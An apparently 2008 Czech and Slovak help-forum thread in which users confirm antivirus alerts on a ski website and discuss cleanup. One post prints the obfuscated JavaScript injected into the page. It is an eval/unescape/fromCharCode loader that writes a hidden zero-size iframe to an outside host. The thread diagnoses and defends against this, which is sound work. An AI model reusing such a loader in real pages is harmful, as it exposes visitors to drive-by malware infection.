Vir,nebo falešný poplach

Avast mi nečekaně zahlásil vir na stránce,měla by to být seriozní stránka,žádný warez nebo něco podobného.Spojení jsem ukončil a protože jsem se s něčím takovým setkal poprvé,tak nevím zda může být i otevření nějaké stránky nebezpečné.Mělo by to být zde
www.goski.sk

Předmět	Autor	Datum
No,mne KIS7 taky haze ze tam je Trojan..! BAGR3210 27.08.2008 23:51	BAGR3210	27.08.2008 23:51
Mýmu Avastu se ta stránka taky nelíbí. Můžeš použít tuto adresu: start.html host 28.08.2008 00:31	host	28.08.2008 00:31
Ha! Muj Avast prohlasil totez. Chce to pockat na lidi s jinym AV (pokud si ten link lajznou). mif 28.08.2008 00:35	mif	28.08.2008 00:35
z Tvojho odkazu,Miroslav ,to hlási cryptgen.trojan aj v avire,aj v antiviral toolkite,,aj hw firewal… ogl 28.08.2008 00:59	ogl	28.08.2008 00:59
Java script malware. Tady je taky BACHA, je tam opravdu, nejvyšší opatrnost! Neklikat kdo neví, jak… Rce 28.08.2008 01:06	Rce	28.08.2008 01:06
ano,tam sa dokonca pokúša na pozadí spustiť súbor hipoint_dlt.com,a starý dobrý slammer,ktorý sa pok… ogl 28.08.2008 01:47	ogl	28.08.2008 01:47
Má Avira také hlásí. Kráťa 28.08.2008 01:42	Kráťa	28.08.2008 01:42
Aj NOD hlási Trojana::) godolphin 28.08.2008 08:59	godolphin	28.08.2008 08:59
Na konci stranky je divny js, ale mne to ako virus nepripada. <script language="JavaScript"> eval(u… fleg 28.08.2008 09:11	fleg	28.08.2008 09:11
Samotný JS není škodlivý, ale to, co vypíše už je na pováženou: <iframe src="http: //polhfd 0.awasr… marekdrtic 28.08.2008 09:29	marekdrtic	28.08.2008 09:29
U mna doslo k normalenmu redirectu na lanovky.sk a ziadny iframe sa nekonal. fleg 28.08.2008 10:19	fleg	28.08.2008 10:19
Tak KAV nehlasi nic a normalne me tam pustil, tak ted jen doufam, ze to fakt nebyl vir. Radek 28.08.2008 09:16	Radek	28.08.2008 09:16
Ty vado... Zapnu to a [http://img171.imageshack.us/img171/6581/avirabu1.gi f] dám delete a za dese… Kráťa 28.08.2008 10:46	Kráťa	28.08.2008 10:46
Možná by stačil ComboFix nebo ten soubor ručně dohledat, popř. totálně vymazat Temp soubory a vůbec… marekdrtic 28.08.2008 10:48	marekdrtic	28.08.2008 10:48
Ale copak jsme to chytili!? ]:) mif 28.08.2008 10:52	mif	28.08.2008 10:52
A pak ať mi nikdo neříká o tom, že Avira je lepší než Avast, s Avastem no problem, nic v msconfigu,… marekdrtic 28.08.2008 11:11	marekdrtic	28.08.2008 11:11
to máš nejakú divnú inštaláciu,podla obrázku máš neaktívnu volbu Repair,nejde Ti Avira v nejakom dem… ogl 28.08.2008 12:02	ogl	28.08.2008 12:02
Něco se furt generuje. Něco bat*.tmp jdu to prozkoumat. Kráťa 28.08.2008 15:50	Kráťa	28.08.2008 15:50
jestli to komunikuje ven, třeba kvůli stahování, zkus log svého obousměrného firewallu. nějaký proce… poslední lední brtník 28.08.2008 16:45	lední brtník	28.08.2008 16:45

No,mne KIS7 taky haze ze tam je Trojan..!

Mýmu Avastu se ta stránka taky nelíbí.

Můžeš použít tuto adresu: start.html

Ha! Muj Avast prohlasil totez. Chce to pockat na lidi s jinym AV (pokud si ten link lajznou).

z Tvojho odkazu,Miroslav ,to hlási cryptgen.trojan aj v avire,aj v antiviral toolkite,,aj hw firewall mi signalizoval pokus o neoprávnený prienik cez určité porty,takže ten odkaz určite nieje úplne v poriadku

Java script malware. Tady je taky BACHA, je tam opravdu, nejvyšší opatrnost! Neklikat kdo neví, jak se bránit!!: www.ultima.cz

ano,tam sa dokonca pokúša na pozadí spustiť súbor hipoint_dlt.com,a starý dobrý slammer,ktorý sa pokúša spúšťať inštanciu sql/msde

Má Avira také hlásí.

Aj NOD hlási Trojana

Na konci stranky je divny js, ale mne to ako virus nepripada.

<script language="JavaScript"> eval(unescape("document.write%28String.fromCharCod e%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C11 5%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58 %2C47%2C47%2C112%2C111%2C108%2C104%2C102%2C100%2C11 0%2C46%2C97%2C119%2C97%2C115%2C114%2C46%2C99%2C110% 2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104 %2C112%2C63%2C111%2C117%2C116%2C61%2C49%2C50%2C48%2 C48%2C48%2C57%2C52%2C57%2C50%2C56%2C34%2C32%2C119%2 C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C1 04%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C3 4%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101 %2C62%29%29%3B")); </script>

Samotný JS není škodlivý, ale to, co vypíše už je na pováženou:

Jsou tam malé chyby, dělal jsem to ručně, ale to, že to vypíše iframe vše vysvětluje.

U mna doslo k normalenmu redirectu na lanovky.sk a ziadny iframe sa nekonal.

Tak KAV nehlasi nic a normalne me tam pustil, tak ted jen doufam, ze to fakt nebyl vir.

Ty vado... Zapnu to a

[http://img171.imageshack.us/img171/6581/avirabu1.gi f]

dám delete a za deset minut znovu. Projedu v nouzovém režimu v Superantispyware, najde to 8 cookies, resetuji a zase. V po spuštění nic podezřelého...
Jdu mrknout na toho batif.tmp

Možná by stačil ComboFix nebo ten soubor ručně dohledat, popř. totálně vymazat Temp soubory a vůbec i Temporary Internet Files, tam je javascriptů hodně...

Ale copak jsme to chytili!?

A pak ať mi nikdo neříká o tom, že Avira je lepší než Avast, s Avastem no problem, nic v msconfigu, nic v tempech atd.

to máš nejakú divnú inštaláciu,podla obrázku máš neaktívnu volbu Repair,nejde Ti Avira v nejakom demo režime ? rekontroluj si pre istotu nastavenia programu

Něco se furt generuje. Něco bat*.tmp jdu to prozkoumat.

jestli to komunikuje ven, třeba kvůli stahování, zkus log svého obousměrného firewallu.
nějaký process explorer a výpis co se spouští po startu by taky mohly uspět.

Zpět do poradny Odpovědět na původní otázku Nahoru